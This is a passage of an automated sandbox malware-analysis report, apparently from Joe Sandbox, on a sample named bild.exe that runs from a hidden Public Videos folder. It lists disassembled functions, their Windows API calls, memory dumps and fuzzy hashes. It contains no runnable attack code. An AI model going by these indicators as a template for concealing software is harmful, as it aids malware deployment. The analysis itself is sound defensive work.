                                                                                    • Instruction Fuzzy Hash: FC310575A04B059FD315CF69C884B9AFBE4FB4C314F10866EE85AC7750EB34A854CB90
                                                                                    Function 110B3340 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(0000002C,420B7E12,?,?,00000000,00000000,00000000,Function_00182078,000000FF,?,1103D571,?,420B7E12,?,?,00000000), ref: 110B336F
                                                                                    • LeaveCriticalSection.KERNEL32(0000002C,?,1103D571,?,420B7E12,?,?,00000000,?,00000015,00000000), ref: 110B338E
                                                                                    • SetEvent.KERNEL32(?,?,?,1103D571,?,420B7E12,?,?,00000000,?,00000015,00000000), ref: 110B33D4
                                                                                    • LeaveCriticalSection.KERNEL32(0000002C,?,?,1103D571,?,420B7E12,?,?,00000000,?,00000015,00000000), ref: 110B33DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$EnterEvent
                                                                                    • String ID:
                                                                                    • API String ID: 3394196147-0
                                                                                    • Opcode ID: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                    • Instruction ID: 2836c68be1e173ca97a40bbc94208784cbdba460b006acea4806f33579668287
                                                                                    • Opcode Fuzzy Hash: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                    • Instruction Fuzzy Hash: 6221DF76A087089FD315CFA8D884B9AF7E8FB4C715F008A2EE816C7640DB79B404CB94
                                                                                    Function 11113240 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 11113252
                                                                                    • SetCursor.USER32(00000000,?,?,11120606,00000000,00000000,11124B99,00000000,00000000,00000000,00000000,View,BlankAll,00000000,00000000,00000004), ref: 11113259
                                                                                    • DestroyCursor.USER32(?), ref: 11113270
                                                                                    • DestroyCursor.USER32(?), ref: 1111327D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Cursor$Destroy$Load
                                                                                    • String ID:
                                                                                    • API String ID: 3167891023-0
                                                                                    • Opcode ID: cf8b1945f01808845252a66b1172c4e509a608c0218fa3bfec4bfdca6e73ac18
                                                                                    • Instruction ID: a2e30b34d5d2f1c91a37dce4984a5637c3bf472293567a6a29e36ae9608199f7
                                                                                    • Opcode Fuzzy Hash: cf8b1945f01808845252a66b1172c4e509a608c0218fa3bfec4bfdca6e73ac18
                                                                                    • Instruction Fuzzy Hash: 5EE09B7091CB009BDB019B798CCC957F7E8BBD4711B20093DE17EC210CC735A4418B10
                                                                                    Function 110071A5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072F7
                                                                                    • SetFocus.USER32(?), ref: 11007353
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                    • String ID: edit
                                                                                    • API String ID: 1305092643-2167791130
                                                                                    • Opcode ID: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                    • Instruction ID: cb86e9af08271205595a6f41abc8b2cb286fac045a185d6d6013f354b30fec65
                                                                                    • Opcode Fuzzy Hash: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                    • Instruction Fuzzy Hash: 8951B1B6A00606AFE741CF64CC80BABB7E5FB88354F15816DF955C7340EB34E9428B61
                                                                                    Function 110091F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                                                    • _memmove.LIBCMT ref: 110092B6
                                                                                      • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                    • String ID: string too long
                                                                                    • API String ID: 2168136238-2556327735
                                                                                    • Opcode ID: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                    • Instruction ID: 8571876bfdcccba51c928a6a288fcd5c1e124ad980ef247a8f71a2e078b75a0c
                                                                                    • Opcode Fuzzy Hash: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                    • Instruction Fuzzy Hash: A731C732B14A104BF720DE9CE88095FF7EDEBE57A4B20061FE599C7640E7719C5083A1
                                                                                    Function 1108F2F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • std::exception::exception.LIBCMT ref: 1108F38C
                                                                                    • __CxxThrowException@8.LIBCMT ref: 1108F3A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                    • String ID: L
                                                                                    • API String ID: 1338273076-2909332022
                                                                                    • Opcode ID: 3896e810ab9ec8afa04ae16f69e355a36910fef65e5343e495f94c92c586995c
                                                                                    • Instruction ID: a4fae97c5fdb08f5bbe7be2be84186cb3cec15bbd065a55e87689edd9833ea14
                                                                                    • Opcode Fuzzy Hash: 3896e810ab9ec8afa04ae16f69e355a36910fef65e5343e495f94c92c586995c
                                                                                    • Instruction Fuzzy Hash: E73177B5D04259AFDB10DFA5C880BDEFBF8FB08754F04826DE915A7280D775A904CB51
                                                                                    Function 11041350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::exception::exception.LIBCMT ref: 11041413
                                                                                    • __CxxThrowException@8.LIBCMT ref: 11041421
                                                                                    Strings
                                                                                    • VolumeControl exception : %hs, xrefs: 11041431
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                    • String ID: VolumeControl exception : %hs
                                                                                    • API String ID: 3728558374-910296547
                                                                                    • Opcode ID: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                    • Instruction ID: 3351f46422f9e7833a0dd597507e069f064f33e0319a204fc915276dbd9183a5
                                                                                    • Opcode Fuzzy Hash: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                    • Instruction Fuzzy Hash: A721E775F006059FCF01CF65C890BFEF7E8EB49609FA085A9E81697A40DB35B904CBA1
                                                                                    Function 1100F260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F27B
                                                                                      • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                      • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                      • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F292
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                    • String ID: string too long
                                                                                    • API String ID: 963545896-2556327735
                                                                                    • Opcode ID: 6b1525799c9edef334f4852062e8405e18519a63a5733119385c965e45330704
                                                                                    • Instruction ID: bb54faa7590d99a912cddc2b6cd1eeb78aa94a45d21c5f83dac251cd0972bc34
                                                                                    • Opcode Fuzzy Hash: 6b1525799c9edef334f4852062e8405e18519a63a5733119385c965e45330704
                                                                                    • Instruction Fuzzy Hash: EE119A377046544FE321D99CE880B6AF7E9EF956A4F20066FE59187650C7A1A84483A2
                                                                                    Function 110B9280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(8D111939,00000009,?,?,?,?,?,?,?,?,?,?,110BA3E6,110BFEBC), ref: 110B92CB
                                                                                      • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004C), ref: 110B8642
                                                                                      • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004D), ref: 110B8649
                                                                                      • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004E), ref: 110B8650
                                                                                      • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004F), ref: 110B8657
                                                                                      • Part of subcall function 110B8610: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8666
                                                                                      • Part of subcall function 110B8610: GetSystemMetrics.USER32(?), ref: 110B8674
                                                                                      • Part of subcall function 110B8610: GetSystemMetrics.USER32(00000001), ref: 110B8683
                                                                                    • MoveWindow.USER32(8D111939,?,?,?,?,00000001), ref: 110B92F3
                                                                                    Strings
                                                                                    • j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B930D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                                    • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                                    • API String ID: 2940908497-693965840
                                                                                    • Opcode ID: eeba164e39b9a206ee0bd13021fe79c14c8f790cdcea3297abcc58d2d41d4cb3
                                                                                    • Instruction ID: ea8a17caf2cab53e8fa0eb5ee6ebbdabb1f0cf5c0d35e4c5ce58ed4944f537fe
                                                                                    • Opcode Fuzzy Hash: eeba164e39b9a206ee0bd13021fe79c14c8f790cdcea3297abcc58d2d41d4cb3
                                                                                    • Instruction Fuzzy Hash: FF21EA75B0060AAFDB08DFA8C995DBEF7B5FB88304F104668E51997354DA30BD01CBA4
                                                                                    Function 111471A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                      • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Public\Videos\Video\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                    • _memmove.LIBCMT ref: 11147211
                                                                                    Strings
                                                                                    • Failed to get callstack, xrefs: 111471BD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentFileModuleNameProcess_memmove
                                                                                    • String ID: Failed to get callstack
                                                                                    • API String ID: 4135527288-766476014
                                                                                    • Opcode ID: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                    • Instruction ID: 4fb2fbc616631b5574b6180649b942946bf04768c5170edb731833e4cde01d29
                                                                                    • Opcode Fuzzy Hash: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                    • Instruction Fuzzy Hash: D3219875A0011D9BCB14DF64DD94BAEB3B9EF8871CF1041AAEC0DA7240DB31AE54CB90
                                                                                    Function 110ED250 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegQueryValueExA.ADVAPI32(00020019,?,00000000,420B7E12,00000000,00020019,?,00000000), ref: 110ED280
                                                                                      • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: QueryValuewvsprintf
                                                                                    • String ID: ($Error %d getting %s
                                                                                    • API String ID: 141982866-3697087921
                                                                                    • Opcode ID: ef2d7f3509dbd67b9f71e6e81423e7131c7de3edf52ba7e7570321b23b06e68c
                                                                                    • Instruction ID: 38ad67af7cf9c35c8db4f97e6700948d2d14c8bc089a0f5a48db9c7a16624884
                                                                                    • Opcode Fuzzy Hash: ef2d7f3509dbd67b9f71e6e81423e7131c7de3edf52ba7e7570321b23b06e68c
                                                                                    • Instruction Fuzzy Hash: 7011A372E01118AFDB00DEA9DD45DEFB3B8EB94225F00816EF81597140DA71E914C761
                                                                                    Function 110D12F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wvsprintfA.USER32(?,?,00000000), ref: 110D1322
